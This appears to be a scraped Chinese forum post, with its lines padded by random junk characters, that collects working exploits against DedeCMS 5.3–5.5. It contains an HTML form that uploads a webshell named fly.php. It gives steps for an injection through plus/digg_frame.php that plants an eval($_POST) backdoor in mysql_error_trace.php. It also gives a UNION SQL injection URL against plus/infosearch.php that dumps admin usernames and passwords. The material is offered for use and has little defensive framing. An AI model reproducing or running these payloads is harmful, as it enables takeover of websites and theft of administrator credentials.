! ?" l& X6 t5 v+ w<input type='hidden' name='job' value='upload' />
) A( P0 b' m3 H( R1 p* F* v<input type='hidden' name='newname' value='fly.php' />
! A; }! o7 A6 N9 ~8 HSelect U Shell <input type='file' name='uploadfile' size='25' />
. [$ ]3 r+ N' o" @<input type='submit' name='sb1' value='确定' />  k% _3 K1 c, [# J4 d% r7 Y" s
</form>6 K6 x- A+ p/ O. Z( A. ~0 Y1 k$ x
<br />It's just a exp for the bug of Dedecms V55...<br />
  j0 f6 g' A5 G- G! {  }Need register_globals = on...<br />" e2 {3 G, x, p: H
Fun the game,get a webshell at /data/cache/fly.php...<br />
9 ]  A. s7 y) y6 @$ n  v0 J, Q</body>9 K- |  D! w2 M9 B; B& N
</html>
' X2 I& q! H  w: v1 E4 s4 d1 z8 f& g
, j. v+ t1 Y1 f: X8 w5 O
: v. b* g- |6 Y$ L2 C' R! c/ t& }" c; P+ w
4 \" L1 I$ ~- L7 ]$ t

8 k$ O: N9 z( l5 \/ c+ T
' r3 Q; Z3 o% I. B: C9 c  S6 j1 s# |5 @! N! {3 X

7 W" w! g7 t! }3 H4 b2 O8 K3 q( F8 F% h0 K

# d1 n) q; W* {+ X% v* r1 i织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
9 j+ `! F- z6 Z9 s$ f利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
8 }1 q7 M4 h; ?- M& `+ F0 @) v7 }1. 访问网址：
/ D: O* X7 A+ |2 ?" Shttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
2 c# d. S$ I& P0 o. S可看见错误信息
1 [, d- O( i- p+ `4 H( r# ?0 H* s0 j/ {* E6 y- {/ z
$ |+ f8 T9 ~5 l% R: j. u: ~! V
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。& j4 d; O! s4 p) c+ U
int(3) Error: Illegal double '1024e1024' value found during parsing% @) H* z  ]  g3 ~- t" o1 \' T2 a
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>1 ~! ?9 s5 b7 H" ?6 G7 L
6 T3 L: B/ p6 I5 z* n0 O) B
- w/ n2 Z* l# y* p
3. 执行dede.rar里的文件 test.html，注意 form 中 action 的地址是8 I7 J6 {7 i- `# c6 l

& E0 @# ?: ]0 G2 o5 j7 E2 `" q# ]0 a3 a# }4 O6 S3 m
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>4 h  z4 k; ^4 x3 e0 x

4 V; G# e' H# Q2 e( P- J2 h6 @. J& k- J6 V9 Q5 V' K" S3 i2 G
按确定后的看到第2步骤的信息表示文件木马上传成功.
$ T0 L0 @! \  A- M8 g
4 P8 X9 `/ E: E! M' l. X
3 n: y  Q  l* ?' U, L& M6 G* y" d( x# p  {

4 C1 q& ]/ d9 z5 ~: P# N) D
$ J6 o9 J9 q: M: m: S( U' X
# K5 y& a/ v* w0 ]4 F4 y
( X8 S$ L  h5 a5 e! J  N/ p
! S! h! R3 u1 a5 v) s$ Z
/ b( w/ g- [: d
7 u: U& Z  M" G: l. g, y1 N& B. c, b
+ V" K" J( u' h7 h( i
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
) k4 w) }* ]6 Y0 Ohttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

		自动登录	找回密码
密码			立即注册